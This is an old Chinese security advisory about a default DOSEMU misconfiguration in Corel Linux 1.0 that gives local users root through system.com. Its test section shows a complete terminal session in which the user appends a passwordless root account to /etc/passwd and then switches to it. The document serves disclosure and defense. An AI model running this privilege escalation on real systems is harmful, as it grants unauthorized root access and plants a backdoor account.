发布日期：2000-02-27
更新日期：2000-02-27

受影响系统：

Dosemu
+   Core Linux 1.0

描述：

---

Core Linux 1.0所带的DOSEMU中有个缺省的配置错误,这可能被本地用户利用以root权限来
执行任意命令。这个问题在于任何运行了dosemu进入DOS仿真模式的用户都被允许执行
system.com命令,这个命令将执行libc库函数system(),并没有完全放弃root特权，所以攻击
者可能利用这个漏洞执行任何命令（以root身份)
    
<* 来源: suid@suid.kg
         http://www.suid.edu/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

        nebula:~$ id
        uid=1000(suid) gid=1000(suid) groups=1000(suid)
        nebula:~$ cat > hack-corel
        #!/bin/bash
        echo "owned::0:0::/:/bin/bash" >> /etc/passwd
        ^D
        nebula:~$ chmod a+rx hack-corel
        nebula:~$ export PATH="$PATH:."
        nebula:~$ dos
        CPU speed set to 430/1 MHz
        Running on CPU=586, FPU=1, rdtsc=1

            [ snip bunch of dosemu crap ]

        "Welcome to dosemu 0.98!
        C:\> system hack-corel;
        sh: : command not found
        C:\> exitERROR: general protection at 0x3f0ff: 0
        ERROR: SIGSEGV, protected insn...exiting!

        nebula:~$ tail -1 /etc/passwd
        owned::0:0::/:/bin/bash
        nebula:~$ su owned
        nebula:/home/suid# id
        uid=0(root) gid=0(root) groups=0(root)
        nebula:/home/suid# exit
        exit
        nebula:~$ exit

建议：

---

禁止用户执行system.com

浏览次数：6727
严重程度：0（网友投票）